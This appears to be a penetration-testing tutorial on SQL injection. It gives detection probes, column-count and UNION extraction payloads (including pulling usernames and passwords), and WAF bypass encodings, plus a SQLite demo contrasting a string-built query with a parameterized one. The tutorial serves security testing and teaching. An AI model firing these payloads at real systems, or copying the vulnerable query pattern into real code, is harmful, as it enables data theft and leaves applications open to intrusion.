SQL Injection Testing: From Detection to Data Extraction
SQL Injection (SQLi) is one of the most impactful vulnerabilities a tester can find. It can lead to data theft, authentication bypass, and in some cases, remote code execution. This guide walks through the complete SQLi testing methodology.
Step 1: Detection
Before extracting data, you need to confirm the injection point. Start with these probes:
Boolean-Based Detection
' AND 1=1-- (true condition - normal response)
' AND 1=2-- (false condition - different response)
If the responses differ, you likely have a boolean-based SQLi.
Time-Based Detection
' AND SLEEP(5)-- (MySQL)
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
' AND pg_sleep(5)-- (PostgreSQL)
If the response is consistently delayed by about 5 seconds (repeat the probe to rule out ordinary network latency), time-based blind SQLi is confirmed.
Error-Based Detection
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))-- (MySQL)
' AND 1=CAST(version() AS int)-- (PostgreSQL)
' AND 1=CONVERT(int,@@version)-- (MSSQL)
Step 2: Determine Column Count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (keep incrementing until an error; the last value that works is the column count)
Or use UNION SELECT with NULL placeholders, adding one NULL per attempt until the query stops erroring:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Step 3: Extract Data
Once you know the column count, extract data using UNION SELECT (the examples below assume a two-column query, with NULL padding the unused column):
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--
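As an added example that is not part of this guide: a small self-contained SQLite script, with a constructed products table, showing why the boolean and UNION probes above produce a response differential against a string-built query, and that the same inputs produce no differential and no extra rows against the parameterized version of the same lookup.

```python
import sqlite3

# Constructed sample table for the demo; not from any real application.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Widget", "tools"), (2, "Gadget", "tools"), (3, "Sprocket", "parts")],
    )
    return conn

def vulnerable_lookup(conn, category):
    # The defect: user input is spliced into the SQL text, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT id, name FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, category):
    # The fix: the value is bound as a parameter, so it is only ever data.
    sql = "SELECT id, name FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()

def boolean_differential(lookup, conn):
    # The Step 1 probe pair. Returns True when the two responses differ,
    # which is the signal both a tester and a detection rule key on.
    rows_true = lookup(conn, "tools' AND 1=1--")
    rows_false = lookup(conn, "tools' AND 1=2--")
    return rows_true != rows_false

def union_probe(lookup, conn, n_cols):
    # The Step 2 probe: UNION SELECT with n_cols NULL placeholders. Returns the
    # rows, or the database's error text when the column count does not match.
    payload = "' UNION SELECT " + ",".join(["NULL"] * n_cols) + "--"
    try:
        return lookup(conn, payload)
    except sqlite3.OperationalError as exc:
        return str(exc)

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable differential:", boolean_differential(vulnerable_lookup, db))    # True
    print("parameterized differential:", boolean_differential(safe_lookup, db))       # False
    print("vulnerable UNION, 1 col:", union_probe(vulnerable_lookup, db, 1))          # error text
    print("vulnerable UNION, 2 cols:", union_probe(vulnerable_lookup, db, 2))         # [(None, None)]
    print("parameterized UNION, 2 cols:", union_probe(safe_lookup, db, 2))            # []
```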
Database-Specific Cheat Sheet
Each database has unique syntax. Use our SQL Injection Generator to auto-generate payloads for MySQL, PostgreSQL, MSSQL, Oracle, and SQLite. See the full SQL Injection Cheat Sheet for 70+ payloads.
WAF Bypass Techniques
When a WAF blocks your payloads, try:
- Inline comments: /*!UNION*/ /*!SELECT*/
- Case variation: uNiOn SeLeCt
- URL encoding: %55NION %53ELECT
- Newline injection: UNION%0ASELECT
Our WAF Bypass Generator can automatically apply these techniques to any payload. You can also chain WAF bypass encoding with the Encoding Pipeline for multi-layer obfuscation.
Related Reading
SQL injection is frequently chained with other attacks. Use Command Injection payloads when SQLi leads to OS command execution (e.g., via xp_cmdshell in MSSQL). For NoSQL databases like MongoDB, see our NoSQL Injection Generator instead. Explore our SSRF Exploitation Guide to learn how SQLi can enable server-side request forgery, or read the XSS Payloads Guide for second-order attacks where SQL-injected data triggers XSS.